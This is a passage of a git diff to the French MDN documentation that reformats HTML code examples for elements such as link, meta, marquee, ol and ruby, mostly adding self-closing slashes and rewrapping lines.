 L'attribut `rel` vaut `preload` et indique que le navigateur doit précharger la ressource (voir [Le préchargement du contenu avec `rel="preload"`](/fr/docs/Web/HTML/Précharger_du_contenu) pour plus de détails), l'attribut `as` indique la classe de contenu qui est récupéré et l'attribut `crossorigin` indique si la ressource doit être récupérée avec une requête CORS.
@@ -167,7 +177,7 @@ Cet élément inclut [les attributs universels](/fr/docs/Web/HTML/Attributs_univ
 Pour associer une feuille de style à la page courante, on utilisera la syntaxe suivante :
 
 ```html
-<link href="style.css" rel="stylesheet">
+<link href="style.css" rel="stylesheet" />
 ```
 
 ### Fournir des feuilles de style alternatives
@@ -177,9 +187,9 @@ Pour un document, on peut indiquer [plusieurs feuilles de style alternatives](/f
 L'utilisateur pourra choisir parmi ces feuilles de style via le menu « Affichage > Style de la page ». Ainsi, un utilisateur pourra voir différentes versions d'une même page.
 
 ```html
-<link href="default.css" rel="stylesheet" title="Mise en forme par défaut">
-<link href="joli.css" rel="alternate stylesheet" title="Joli">
-<link href="simple.css" rel="alternate stylesheet" title="Simple">
+<link href="default.css" rel="stylesheet" title="Mise en forme par défaut" />
+<link href="joli.css" rel="alternate stylesheet" title="Joli" />
+<link href="simple.css" rel="alternate stylesheet" title="Simple" />
 ```
 
 ### Évènements déclenchés au chargement d'une feuille de style
@@ -198,9 +208,11 @@ Il est possible de déterminer si une feuille de style a été chargée en écou
   }
 </script>
 
-<link rel="stylesheet" href="mafeuilledestyle.css"
+<link
+  rel="stylesheet"
+  href="mafeuilledestyle.css"
   onload="sheetLoaded()"
-  onerror="sheetError()">
+  onerror="sheetError()" />
 ```
 
 > **Note :** L'évènement `load` est déclenché une fois que la feuille de style et que le contenu associé ont été chargés et analysés et immédiatement avant que la mise en forme soit appliquée au contenu.

--- a/files/fr/web/html/element/main/index.md
+++ b/files/fr/web/html/element/main/index.md
@@ -34,18 +34,22 @@ Cet élément prend uniquement en charge [les attributs universels](/fr/docs/Web
 
   <article>
     <h2>Pomme rouge</h2>
-    <p>Ce sont des pommes rouges vives très communes dans les supermarchés.<p>
-    <p>... </p>
-    <p>... </p>
+    <p>Ce sont des pommes rouges vives très communes dans les supermarchés.</p>
+    <p></p>
+    <p>...</p>
+    <p>...</p>
   </article>
 
   <article>
     <h2>La Granny Smith</h2>
-    <p>Ces pommes juteuses, vertes, font une très belle garniture pour les tartes aux pommes.<p>
-    <p>... </p>
-    <p>... </p>
+    <p>
+      Ces pommes juteuses, vertes, font une très belle garniture pour les tartes
+      aux pommes.
+    </p>
+    <p></p>
+    <p>...</p>
+    <p>...</p>
   </article>
-
 </main>
 
 <!-- Autre contenu -->

--- a/files/fr/web/html/element/map/index.md
+++ b/files/fr/web/html/element/map/index.md
@@ -23,10 +23,13 @@ Comme tous les autres éléments HTML, cet élément inclut [les attributs unive
 
 ```html
 <map name="primary">
-  <area shape="circle" coords="75,75,75" href="left.html">
-  <area shape="circle" coords="275,75,75" href="right.html">
+  <area shape="circle" coords="75,75,75" href="left.html" />
+  <area shape="circle" coords="275,75,75" href="right.html" />
 </map>
-<img usemap="#primary" src="https://via.placeholder.com/350x150" alt="350 x 150 pic">
+<img
+  usemap="#primary"
+  src="https://via.placeholder.com/350x150"
+  alt="350 x 150 pic" />
 ```
 
 ### Résultat

--- a/files/fr/web/html/element/mark/index.md
+++ b/files/fr/web/html/element/mark/index.md
@@ -46,15 +46,17 @@ Dans cet exemple, on utilise `<mark>` pour marquer les résultats d'une recherch
 #### HTML
 
 ```html
-<p>It is a dark time for the Rebellion. Although the Death
-Star has been destroyed, <mark class="match">Imperial</mark>
-troops have driven the Rebel forces from their hidden base and
-pursued them across the galaxy.</p>
+<p>
+  It is a dark time for the Rebellion. Although the Death Star has been
+  destroyed, <mark class="match">Imperial</mark> troops have driven the Rebel
+  forces from their hidden base and pursued them across the galaxy.
+</p>
 
-<p>Evading the dreaded <mark class="match">Imperial</mark>
-Starfleet, a group of freedom fighters led by Luke Skywalker
-has established a new secret base on the remote ice world of
-Hoth.</p>
+<p>
+  Evading the dreaded <mark class="match">Imperial</mark> Starfleet, a group of
+  freedom fighters led by Luke Skywalker has established a new secret base on
+  the remote ice world of Hoth.
+</p>
 ```
 
 #### Résultat

--- a/files/fr/web/html/element/marquee/index.md
+++ b/files/fr/web/html/element/marquee/index.md
@@ -25,7 +25,7 @@ L'élément HTML **`<marquee>`** est utilisé pour insérer une zone de texte d�
 - `scrollamount`
   - : Définit la quantité de défilement de chaque défilement en pixels. La valeur par défaut est `6`.
 - `scrolldelay`
-  - : Définit l'intervalle entre chaque défilement en millisecondes. La valeur par défaut est `85`. Notez que toute valeur inférieure à 60 sera ignorée et 60 sera utilisé à la place, à moins que` truespeed `ne soit spécifié.
+  - : Définit l'intervalle entre chaque défilement en millisecondes. La valeur par défaut est `85`. Notez que toute valeur inférieure à 60 sera ignorée et 60 sera utilisé à la place, à moins que`truespeed`ne soit spécifié.
 - `truespeed`
   - : Par défaut, les valeurs de `scrolldelay` inférieures à 60 sont ignorées. Si `truespeed` est présent, ces valeurs ne seront pas ignorées.
 - `vspace`
@@ -58,10 +58,13 @@ L'élément HTML **`<marquee>`** est utilisé pour insérer une zone de texte d�
 
 <marquee direction="up">Ce texte va défiler de bas en haut</marquee>
 
-<marquee direction="down" width="250" height="200" behavior="alternate" style="border:solid">
-  <marquee behavior="alternate">
-    Ce texte va rebondir
-  </marquee>
+<marquee
+  direction="down"
+  width="250"
+  height="200"
+  behavior="alternate"
+  style="border:solid">
+  <marquee behavior="alternate"> Ce texte va rebondir </marquee>
 </marquee>
 ```
 

--- a/files/fr/web/html/element/menu/index.md
+++ b/files/fr/web/html/element/menu/index.md
@@ -49,7 +49,8 @@ On notera que, sur le plan fonctionnel, cela est équivalent à&nbsp;:
 #### CSS
 
 ```css
-menu, ul {
+menu,
+ul {
   display: flex;
   list-style: none;
   padding: 0;

--- a/files/fr/web/html/element/menuitem/index.md
+++ b/files/fr/web/html/element/menuitem/index.md
@@ -48,14 +48,20 @@ Cet élément inclut également [les attributs universels](/fr/docs/Web/HTML/Att
 
 <menu type="context" id="popup-menu">
   <menuitem type="checkbox" checked>Une case à cocher</menuitem>
-  <hr>
-  <menuitem type="command" label="Cette commande ne fait rien" icon="https://developer.mozilla.org/static/img/favicon144.png">
+  <hr />
+  <menuitem
+    type="command"
+    label="Cette commande ne fait rien"
+    icon="https://developer.mozilla.org/static/img/favicon144.png">
     Les commandes n'affichent pas leurs contenus.
   </menuitem>
-  <menuitem type="command" label="Cette commande contient du JavAScript" onclick="alert('command clicked')">
+  <menuitem
+    type="command"
+    label="Cette commande contient du JavAScript"
+    onclick="alert('command clicked')">
     Les commandes n'affichent pas leurs contenus.
   </menuitem>
-  <hr>
+  <hr />
   <menuitem type="radio" radiogroup="group1">Bouton radio 1</menuitem>
   <menuitem type="radio" radiogroup="group1">Bouton radio 2</menuitem>
 </menu>

--- a/files/fr/web/html/element/meta/index.md
+++ b/files/fr/web/html/element/meta/index.md
@@ -29,7 +29,7 @@ Comme tous les autres éléments, cet élément inclut [les attributs universels
     > - L'élément {{HTMLElement("meta")}} doit appartenir à l'élément {{HTMLElement("head")}} et doit apparaître parmi les **512 premiers octets de la page**. En effet, certains navigateurs ne consultent seulement ces premiers octets pour déterminer l'encodage utilisé pour la page.
     > - L'élément {{HTMLElement("meta")}} ne représente qu'une partie de l'[algorithme déterminant le jeu de caractères](https://www.whatwg.org/specs/web-apps/current-work/multipage/parsing.html#encoding-sniffing-algorithm) à appliquer sur la page par le navigateur. Ainsi, l'en-tête HTTP Content-Type et tous les éléments BOM auront une priorité supérieure à cet élément.
     > - Définir le jeu de caractères utilisé grâce à cet attribut représente une bonne pratique et est fortement recommandé. Si aucun encodage n'est défini pour la page, plusieurs techniques XSS peuvent porter atteinte à l'utilisateur (voir l'exemple de la [technique XSS de recours à UTF-7](https://code.google.com/p/doctype-mirror/wiki/ArticleUtf7)). Toujours renseigner cet élément meta protégera contre ces dangers.
-    > - L'élément {{HTMLElement("meta")}} est un synonyme de `<meta http-equiv="Content-Type" content="text/html; charset=IANAcharset">` utilisé avant HTML5. Ici *`IANAcharset`* correspond à la valeur de l'attribut [`charset`](/fr/docs/Web/HTML/Element/meta#charset) correspondant. Bien qu'elle soit obsolète et qu'elle ne soit plus recommandée, cette syntaxe est toujours autorisée.
+    > - L'élément {{HTMLElement("meta")}} est un synonyme de `<meta http-equiv="Content-Type" content="text/html; charset=IANAcharset">` utilisé avant HTML5. Ici _`IANAcharset`_ correspond à la valeur de l'attribut [`charset`](/fr/docs/Web/HTML/Element/meta#charset) correspondant. Bien qu'elle soit obsolète et qu'elle ne soit plus recommandée, cette syntaxe est toujours autorisée.
 
 - `content`
   - : Cet attribut fournit la valeur associée avec l'attribut [`http-equiv`](/fr/docs/Web/HTML/Element/meta#http-equiv) ou l'attribut [`name`](/fr/docs/Web/HTML/Element/meta#name) suivant le contexte utilisé.
@@ -171,6 +171,7 @@ Comme tous les autres éléments, cet élément inclut [les attributs universels
       > - Lorsque plusieurs règles conflictuelles sont définies, c'est la règle `no-referrer` qui est appliquée.
 
     - `theme-color` qui indique une suggestion de couleur que l'agent utilisateur devrait prendre en compte afin de personnaliser l'affichage de la page ou l'interface utilisateur environnante. L'attribut `content` contiendra une couleur valide au sens CSS (cf. {{cssxref("&lt;color&gt;")}}).
+
       - `color-scheme`
 
         - : Définit un ou plusieurs modes de couleurs avec lesquels le document est compatible. Le navigateur utilisera cette information ainsi que les réglages du navigateur ou de l'appareil pour déterminer les couleurs à utiliser (que ce soit pour l'arrière-plan, les contrôles, les barres de défilement, etc.). `<meta name="color-scheme">` sert principalement à indiquer la compatibilité et la préférence pour les différents modes de couleur (sombre / clair entre autres).
@@ -187,7 +188,7 @@ Comme tous les autres éléments, cet élément inclut [les attributs universels
           Ainsi, si on préfére utiliser un mode sombre et laisser le mode clair utilisable, on pourra écrire :
 
           ```html
-          <meta name="color-scheme" content="dark light">
+          <meta name="color-scheme" content="dark light" />
           ```
 
           Cela fonctionne pour l'ensemble du document. Pour cibler des éléments en particulier, on pourra utiliser la propriété CSS {{cssxref("color-scheme")}}. La mise en forme pourra tirer parti du mode utilisé par le système grâce à la caractéristique [`prefers-color-scheme`](/fr/docs/Web/CSS/@media/prefers-color-scheme).
@@ -436,10 +437,10 @@ Selon les attributs qui sont renseignés, la métadonnée peut être de différe
 
 ```html
 <!-- En HTML5 -->
-<meta charset="utf-8">
+<meta charset="utf-8" />
 
 <!-- Rediriger la page après 3 secondes -->
-<meta http-equiv="refresh" content="3;url=http://www.mozilla.org">
+<meta http-equiv="refresh" content="3;url=http://www.mozilla.org" />
 ```
 
 ## Accessibilité

--- a/files/fr/web/html/element/meta/name/index.md
+++ b/files/fr/web/html/element/meta/name/index.md
@@ -13,6 +13,7 @@ L'élément [`<meta>`](/fr/docs/Web/HTML/Element/meta) permet de fournir des mé
 La spécification HTML définit les noms de métadonnées standard suivants&nbsp;:
 
 - `application-name`
+
   - : Le nom de l'application qui s'exécute sur la page web.
 
     > **Note :**
@@ -29,6 +30,7 @@ La spécification HTML définit les noms de métadonnées standard suivants&nbsp
 - `keywords`
   - : Les mots-clés pertinents pour décrire le contenu de la page, séparés par des virgules.
 - `referrer`
+
   - : Contrôle l'en-tête HTTP [`Referer`](/fr/docs/Web/HTTP/Headers/Referer) pour les requêtes envoyées depuis le document&nbsp;:
 
     <table class="standard-table">
@@ -77,6 +79,7 @@ La spécification HTML définit les noms de métadonnées standard suivants&nbsp
 - [`theme-color`](/fr/docs/Web/HTML/Element/meta/name/theme-color)
   - : Fournit une suggestion de couleur que les agents utilisateur peuvent utiliser afin de personnaliser l'affichage de la page ou l'interface utilisateur environnante. L'attribut `content` doit contenir une couleur CSS valide (voir la page sur le type [`<color>`](/fr/docs/Web/CSS/color_value).
 - `color-scheme`
+
   - : Définit un ou plusieurs schémas de couleurs avec lesquels le document est compatible.
 
     Le navigateur utilisera cette information en complément des réglages du navigateur et du système sous-jacent pour déterminer les couleurs à utiliser en arrière-plan et en premier plan pour les contrôles de formulaire et les barres de défilement. L'utilisation principale de `<meta name="color-scheme">` consiste à indiquer la compatibilité avec les modes de thèmes clair ou sombre et l'ordre de préférence associé.
@@ -93,7 +96,7 @@ La spécification HTML définit les noms de métadonnées standard suivants&nbsp
     Ainsi, pour indiquer qu'un document préfère être affiché en mode sombre tout en étant aussi compatible avec un mode clair, on aura&nbsp;:
 
     ```html
-    <meta name="color-scheme" content="dark light">
+    <meta name="color-scheme" content="dark light" />
     ```
 
     Cela fonctionne au niveau du document, de la même façon que la propriété [`color-scheme`](/fr/docs/Web/CSS/color-scheme) permet à des éléments individuels d'indiquer leurs schémas de couleurs préférés et acceptables. Pour adapter la mise en forme en fonction du schéma de couleurs, on pourra utiliser la caractéristique média [`prefers-color-scheme`](/fr/docs/Web/CSS/@media/prefers-color-scheme).
@@ -103,6 +106,7 @@ La spécification HTML définit les noms de métadonnées standard suivants&nbsp
 La spécification CSS sur l'adaptation des appareils (<i lang="en">Device Adaptation</i>) définit les noms de métadonnées suivants&nbsp;:
 
 - `viewport`
+
   - : Fournit une indication à propos de la taille initiale de la zone d'affichage ([<i lang="en">viewport</i>](/fr/docs/Glossary/Viewport)).
 
     <table class="fullwidth-table">
@@ -177,20 +181,21 @@ Désactiver la possibilité de zoomer en utilisant `user-scalable` avec la valeu
 - `publisher`
   - : Le nom de l'éditrice ou de l'éditeur (pour la publication) du document.
 - `robots`
+
   - : Le comportement que les robots d'indexation devraient suivre sur la page. Il s'agit d'une liste de valeurs séparées par des virgules et qui sont décrites dans le tableau suivant&nbsp;:
 
-    | Valeur         | Description                                                                                   | Utilisée par                                                                                                                                                                                                                                                                                     |
-    | -------------- | --------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
-    | `index`        | Permet au robot d'indexer la page (valeur par défaut).                                        | Tous                                                                                                                                                                                                                                                                                             |
-    | `noindex`      | Demande au robot de ne pas indexer la page.                                                   | Tous                                                                                                                                                                                                                                                                                             |
-    | `follow`       | Permet au robot de suivre les liens de la page (valeur par défaut).                           | Tous                                                                                                                                                                                                                                                                                             |
-    | `nofollow`     | Demande au robot de ne pas suivre les liens de la page.                                       | Tous                                                                                                                                                                                                                                                                                             |
-    | `all`          | Équivalent à `index, follow`                                                                  | [Google](https://developers.google.com/search/docs/advanced/crawling/special-tags?visit_id=637855965067987211-415685194&rd=1)                                                                                                                                                                    |
-    | `none`         | Équivalent à `noindex, nofollow`                                                              | [Google](https://developers.google.com/search/docs/advanced/crawling/special-tags?visit_id=637855965074074862-574753619&rd=1)                                                                                                                                                                    |
-    | `noarchive`    | Demande au moteur de recherche de ne pas mettre en cache le contenu de la page.               | [Google](https://developers.google.com/search/docs/advanced/robots/robots_meta_tag), [Yahoo](https://help.yahoo.com/kb/search-for-desktop/SLN2213.html), [Bing](https://www.bing.com/webmasters/help/which-robots-metatags-does-bing-support-5198d240)                                           |
-    | `nosnippet`    | Empêche l'affichage d'une description de la page dans les résultats d'un moteur de recherche. | [Google](https://developers.google.com/search/docs/advanced/robots/robots_meta_tag), [Bing](https://www.bing.com/webmasters/help/which-robots-metatags-does-bing-support-5198d240)                                                                                                               |
-    | `noimageindex` | Demande à ce que cette page n'apparaisse pas comme page référente d'une image indexée.        | [Google](https://developers.google.com/search/docs/advanced/robots/robots_meta_tag)                                                                                                                                                                                                              |
-    | `nocache`      | Synonyme de `noarchive`.                                                                      | [Bing](https://www.bing.com/webmasters/help/which-robots-metatags-does-bing-support-5198d240)                                                                                                                                                                                                    |
+    | Valeur         | Description                                                                                   | Utilisée par                                                                                                                                                                                                                                           |
+    | -------------- | --------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
+    | `index`        | Permet au robot d'indexer la page (valeur par défaut).                                        | Tous                                                                                                                                                                                                                                                   |
+    | `noindex`      | Demande au robot de ne pas indexer la page.                                                   | Tous                                                                                                                                                                                                                                                   |
+    | `follow`       | Permet au robot de suivre les liens de la page (valeur par défaut).                           | Tous                                                                                                                                                                                                                                                   |
+    | `nofollow`     | Demande au robot de ne pas suivre les liens de la page.                                       | Tous                                                                                                                                                                                                                                                   |
+    | `all`          | Équivalent à `index, follow`                                                                  | [Google](https://developers.google.com/search/docs/advanced/crawling/special-tags?visit_id=637855965067987211-415685194&rd=1)                                                                                                                          |
+    | `none`         | Équivalent à `noindex, nofollow`                                                              | [Google](https://developers.google.com/search/docs/advanced/crawling/special-tags?visit_id=637855965074074862-574753619&rd=1)                                                                                                                          |
+    | `noarchive`    | Demande au moteur de recherche de ne pas mettre en cache le contenu de la page.               | [Google](https://developers.google.com/search/docs/advanced/robots/robots_meta_tag), [Yahoo](https://help.yahoo.com/kb/search-for-desktop/SLN2213.html), [Bing](https://www.bing.com/webmasters/help/which-robots-metatags-does-bing-support-5198d240) |
+    | `nosnippet`    | Empêche l'affichage d'une description de la page dans les résultats d'un moteur de recherche. | [Google](https://developers.google.com/search/docs/advanced/robots/robots_meta_tag), [Bing](https://www.bing.com/webmasters/help/which-robots-metatags-does-bing-support-5198d240)                                                                     |
+    | `noimageindex` | Demande à ce que cette page n'apparaisse pas comme page référente d'une image indexée.        | [Google](https://developers.google.com/search/docs/advanced/robots/robots_meta_tag)                                                                                                                                                                    |
+    | `nocache`      | Synonyme de `noarchive`.                                                                      | [Bing](https://www.bing.com/webmasters/help/which-robots-metatags-does-bing-support-5198d240)                                                                                                                                                          |
 
   > **Note :**
   >

--- a/files/fr/web/html/element/meta/name/theme-color/index.md
+++ b/files/fr/web/html/element/meta/name/theme-color/index.md
@@ -11,7 +11,7 @@ La valeur de **`theme-color`** comme attribut [`name`](/fr/docs/Web/HTML/Element
 ## Exemple
 
 ```html
-<meta name="theme-color" content="#4285f4">
+<meta name="theme-color" content="#4285f4" />
 ```
 
 L'image qui suit illustre l'effet de l'élément [`<meta>`](/fr/docs/Web/HTML/Element/meta) avec `theme-color` pour un document affiché dans Chrome sur Android.
@@ -23,8 +23,11 @@ _Crédits image&nbsp;: [Couleurs des icônes et du navigateur](https://web.dev/i
 Il est possible de fournir un type de média ou une requête média avec l'attribut [`media`](/fr/docs/Web/HTML/Element/meta#attr-media) afin que la couleur soit utilisée pour une condition donnée. Par exemple&nbsp;:
 
 ```html
-<meta name="theme-color" media="(prefers-color-scheme: light)" content="white">
-<meta name="theme-color" media="(prefers-color-scheme: dark)" content="black">
+<meta
+  name="theme-color"
+  media="(prefers-color-scheme: light)"
+  content="white" />
+<meta name="theme-color" media="(prefers-color-scheme: dark)" content="black" />
 ```
 
 ## Spécifications

--- a/files/fr/web/html/element/meter/index.md
+++ b/files/fr/web/html/element/meter/index.md
@@ -34,9 +34,7 @@ Comme pour les autres éléments HTML, cet élément inclut également [les attr
     >
     > ```html
     > Utilisation de l'espace de stockage:
-    > <meter value=6 max=8>
-    >   6 blocs utilisés (sur un total de 8)
-    > </meter>
+    > <meter value="6" max="8">6 blocs utilisés (sur un total de 8)</meter>
     > ```
     >
     > Il n'y a pas de moyen sémantique de décrire l'unité de l'attribut **`value`**, néanmoins l'attribut global **`title`** peut être utilisé pour cela.
@@ -48,8 +46,8 @@ Comme pour les autres éléments HTML, cet élément inclut également [les attr
 #### HTML
 
 ```html
-<p>Chauffez le four à
-  <meter min="100" max="250" value="180">180 degrés</meter>.
+<p>
+  Chauffez le four à <meter min="100" max="250" value="180">180 degrés</meter>.
 </p>
 ```
 

--- a/files/fr/web/html/element/noframes/index.md
+++ b/files/fr/web/html/element/noframes/index.md
@@ -24,12 +24,13 @@ Comme tous les autres éléments HTML, cet élément inclut [les attributs unive
 
 ```html
 <frameset cols="50%,50%">
-  <frame src="https://developer.mozilla.org/fr/docs/Web/HTML/Element/frameset"/>
-  <frame src="https://developer.mozilla.org/fr/docs/Web/HTML/Element/frame"/>
+  <frame
+    src="https://developer.mozilla.org/fr/docs/Web/HTML/Element/frameset" />
+  <frame src="https://developer.mozilla.org/fr/docs/Web/HTML/Element/frame" />
   <noframes>
     <p>
-      Il semblerait que votre navigateur ne supporte pas les frames,
-      ou qu'il est configuré pour ne pas les autoriser.
+      Il semblerait que votre navigateur ne supporte pas les frames, ou qu'il
+      est configuré pour ne pas les autoriser.
     </p>
   </noframes>
 </frameset>

--- a/files/fr/web/html/element/object/index.md
+++ b/files/fr/web/html/element/object/index.md
@@ -86,11 +86,11 @@ Comme tous les autres éléments HTML, cet élément inclut [les attributs unive
 ### Intégrer une vidéo YouTube
 
 ```html
-<object type="video/mp4"
-    data="https://www.youtube.com/watch?v=Sp9ZfSvpf7A"
-    width="1280"
-    height="720">
-</object>
+<object
+  type="video/mp4"
+  data="https://www.youtube.com/watch?v=Sp9ZfSvpf7A"
+  width="1280"
+  height="720"></object>
 ```
 
 ## Spécifications

--- a/files/fr/web/html/element/ol/index.md
+++ b/files/fr/web/html/element/ol/index.md
@@ -173,7 +173,10 @@ Pour déterminer la liste à utiliser, essayez de modifier l'ordre des élément
 ### Utilisation de l'attribut start
 
 ```html
-<p>Les places d'arrivée des concurrents qui ne sont pas dans le cercle des gagnants :</p>
+<p>
+  Les places d'arrivée des concurrents qui ne sont pas dans le cercle des
+  gagnants :
+</p>
 
 <ol start="4">
   <li>Speedwalk Stu</li>
@@ -191,13 +194,16 @@ Pour déterminer la liste à utiliser, essayez de modifier l'ordre des élément
 ```html
 <ol>
   <li>Premier élément</li>
-  <li>Deuxième élément  <!-- La fermeture </li> n'est pas encore placée ! -->
+  <li>
+    Deuxième élément
+    <!-- La fermeture </li> n'est pas encore placée ! -->
     <ol>
       <li>Premier élément de la liste imbriquée</li>
       <li>Deuxième élément de la liste imbriquée</li>
       <li>Troisième élément de la liste imbriquée</li>
     </ol>
-  </li>                 <!-- Voici la fermeture </li> ! -->
+  </li>
+  <!-- Voici la fermeture </li> ! -->
   <li>Troisième élément</li>
 </ol>
 ```
@@ -211,13 +217,16 @@ Pour déterminer la liste à utiliser, essayez de modifier l'ordre des élément
 ```html
 <ol>
   <li>Premier élément</li>
-  <li>Deuxième élément  <!-- La fermeture </li> n'est pas placée ici ! -->
+  <li>
+    Deuxième élément
+    <!-- La fermeture </li> n'est pas placée ici ! -->
     <ul>
       <li>Premier élément de la liste non-ordonnée imbriquée</li>
       <li>Deuxième élément de la liste non-ordonnée imbriquée</li>
       <li>Troisième élément de la liste non-ordonnée imbriquée</li>
     </ul>
-  </li>                 <!-- La fermeture </li> est ici. -->
+  </li>
+  <!-- La fermeture </li> est ici. -->
   <li>Troisième élément</li>
 </ol>
 ```

--- a/files/fr/web/html/element/output/index.md
+++ b/files/fr/web/html/element/output/index.md
@@ -27,9 +27,9 @@ Le formulaire qui suit fournit un curseur dont la valeur peut aller de 0 à 100 
 
 ```html
 <form oninput="result.value=parseInt(a.value)+parseInt(b.value)">
-    <input type="range" name="b" value="50" /> +
-    <input type="number" name="a" value="10" /> =
-    <output name="result">60</output>
+  <input type="range" name="b" value="50" /> +
+  <input type="number" name="a" value="10" /> =
+  <output name="result">60</output>
 </form>
 ```
 

--- a/files/fr/web/html/element/p/index.md
+++ b/files/fr/web/html/element/p/index.md
@@ -26,15 +26,12 @@ Cet élément, comme les autres éléments HTML, inclut [les attributs universel
 
 ```html
 <p>
-  Premier paragraphe du texte.
-  J'aime les licornes beaucoup
-  beaucoup beaucoup.
+  Premier paragraphe du texte. J'aime les licornes beaucoup beaucoup beaucoup.
 </p>
 
 <p>
-  Deuxième paragraphe du texte.
-  Et si j'en avais une apprivoisée
-  je serais très contente.
+  Deuxième paragraphe du texte. Et si j'en avais une apprivoisée je serais très
+  contente.
 </p>
 ```
 

--- a/files/fr/web/html/element/param/index.md
+++ b/files/fr/web/html/element/param/index.md
@@ -33,7 +33,7 @@ Comme tous les autres éléments HTML, cet élément inclut [les attributs unive
 
 ```html
 <object data="animation.swf" type="application/x-shockwave-flash">
-  <param name="param11" value="valeurConf">
+  <param name="param11" value="valeurConf" />
 </object>
 ```
 

--- a/files/fr/web/html/element/picture/index.md
+++ b/files/fr/web/html/element/picture/index.md
@@ -37,8 +37,8 @@ L'attribut `media` de l'élément {{HTMLElement("source")}} permet de rédiger u
 
 ```html
 <picture>
- <source srcset="mdn-logo-wide.png" media="(min-width: 600px)">
- <img src="mdn-logo-narrow.png" alt="MDN">
+  <source srcset="mdn-logo-wide.png" media="(min-width: 600px)" />
+  <img src="mdn-logo-narrow.png" alt="MDN" />
 </picture>
 ```
 
@@ -48,8 +48,8 @@ L'attribut `type` d'un élément {{HTMLElement("source")}} permet d'indiquer le 
 
 ```html
 <picture>
- <source srcset="mdn-logo.svg" type="image/svg+xml">
- <img src="mdn-logo.png" alt="MDN">
+  <source srcset="mdn-logo.svg" type="image/svg+xml" />
+  <img src="mdn-logo.png" alt="MDN" />
 </picture>
 ```
 

--- a/files/fr/web/html/element/pre/index.md
+++ b/files/fr/web/html/element/pre/index.md
@@ -90,8 +90,8 @@ Pour légender un tel diagramme, on pourra utiliser une combinaison d'éléments
                   ||     ||
   </pre>
   <figcaption id="cow-caption">
-    Une vache qui dit "Je suis la meuhieure.". La vache
-    est illustrée à l'aide de caractères préformatés.
+    Une vache qui dit "Je suis la meuhieure.". La vache est illustrée à l'aide
+    de caractères préformatés.
   </figcaption>
 </figure>
 ```

--- a/files/fr/web/html/element/progress/index.md
+++ b/files/fr/web/html/element/progress/index.md
@@ -17,7 +17,7 @@ Comme tous les autres éléments HTML, cet élément inclut [les attributs unive
 - `max`
   - : Cet attribut indique la valeur correspondant à la complétion de la tâche. Si l'attribut `max` est présent, sa valeur doit être un nombre décimal supérieur à 0. La valeur par défaut est 1.
 - `value`
-  - : Cet attribut indique l'état actuel de complétion de la tâche avec une valeur numérique. La valeur de l'attribut doit être un nombre décimal compris entre 0 et `max`  (ou entre 0 et 1 si l'attribut `max` est absent). Si l'attribut `value` est absent, la barre de progression traduit un état indéterminé (la tâche est en cours et on ne sait pas la durée qu'elle prendra).
+  - : Cet attribut indique l'état actuel de complétion de la tâche avec une valeur numérique. La valeur de l'attribut doit être un nombre décimal compris entre 0 et `max` (ou entre 0 et 1 si l'attribut `max` est absent). Si l'attribut `value` est absent, la barre de progression traduit un état indéterminé (la tâche est en cours et on ne sait pas la durée qu'elle prendra).
 
 > **Note :** La valeur minimale est toujours 0 et il n'existe pas d'attribut `min` pour l'élément `progress`. La propriété CSS {{cssxref("-moz-orient")}} peut être utilisée afin d'indiquer si barre de progression doit être affichée horizontalement (le comportement par défaut) ou verticalement.
 > La pseudo-classe CSS {{cssxref(":indeterminate")}} permet quant à elle de cibler les barres de progression indéterminées. Pour qu'une barre d'avancement retrouve un état indéterminé après qu'elle ait eu une valeur, on pourra utiliser `element.removeAttribute("value")`.

--- a/files/fr/web/html/element/q/index.md
+++ b/files/fr/web/html/element/q/index.md
@@ -24,10 +24,11 @@ Comme tous les autres éléments HTML, cet élément inclut [les attributs unive
 ### HTML
 
 ```html
-<p>Chaque fois que Kenny est tué, Stan dira
-   <q cite="http://fr.wikipedia.org/wiki/Kenny_McCormick#Le_dialogue_rituel">
-     Oh mon Dieu, ils ont tué Kenny !
-   </q>.
+<p>
+  Chaque fois que Kenny est tué, Stan dira
+  <q cite="http://fr.wikipedia.org/wiki/Kenny_McCormick#Le_dialogue_rituel">
+    Oh mon Dieu, ils ont tué Kenny ! </q
+  >.
 </p>
 ```
 

--- a/files/fr/web/html/element/rb/index.md
+++ b/files/fr/web/html/element/rb/index.md
@@ -24,8 +24,7 @@ Dans cet exemple, on fournit une annotation pour le caractère original correspo
 
 ```html
 <ruby>
-  <rb>漢<rb>字
-  <rp>(</rp><rt>kan<rt>ji<rp>)</rp>
+  <rb>漢</rb><rb>字 </rb><rp>(</rp><rt>kan</rt><rt>ji</rt><rp>)</rp>
 </ruby>
 ```
 
@@ -39,8 +38,7 @@ On aurait également pu écrire cet exemple avec les deux parties du texte de ba
 
 ```html
 <ruby>
-  漢 <rp>(</rp><rt>Kan</rt><rp>)</rp>
-  字 <rp>(</rp><rt>ji</rt><rp>)</rp>
+  漢 <rp>(</rp><rt>Kan</rt><rp>)</rp> 字 <rp>(</rp><rt>ji</rt><rp>)</rp>
 </ruby>
 ```
 
@@ -51,7 +49,9 @@ On aurait également pu écrire cet exemple avec les deux parties du texte de ba
 ### Avec prise en charge de ruby
 
 ```html hidden
-<ruby> <rb>漢<rb>字 <rp>(</rp><rt>kan<rt>ji<rp>)</rp> </ruby>
+<ruby>
+  <rb>漢</rb><rb>字 </rb><rp>(</rp><rt>kan</rt><rt>ji</rt><rp>)</rp>
+</ruby>
 ```
 
 ```css hidden

--- a/files/fr/web/html/element/rp/index.md
+++ b/files/fr/web/html/element/rp/index.md
@@ -26,8 +26,7 @@ Cet élément inclut uniquement [les attributs universels](/fr/docs/Web/HTML/Att
 
 ```html
 <ruby>
-  漢 <rp>(</rp><rt>Kan</rt><rp>)</rp>
-  字 <rp>(</rp><rt>ji</rt><rp>)</rp>
+  漢 <rp>(</rp><rt>Kan</rt><rp>)</rp> 字 <rp>(</rp><rt>ji</rt><rp>)</rp>
 </ruby>
 ```
 

--- a/files/fr/web/html/element/rt/index.md
+++ b/files/fr/web/html/element/rt/index.md
@@ -21,10 +21,7 @@ Cet élément inclut uniquement [les attributs universels](/fr/docs/Web/HTML/Att
 #### HTML
 
 ```html
-<ruby>
-  漢 <rt>Kan</rt>
-  字 <rt>ji</rt>
-</ruby>
+<ruby> 漢 <rt>Kan</rt> 字 <rt>ji</rt> </ruby>
 ```
 
 ```css hidden

--- a/files/fr/web/html/element/rtc/index.md
+++ b/files/fr/web/html/element/rtc/index.md
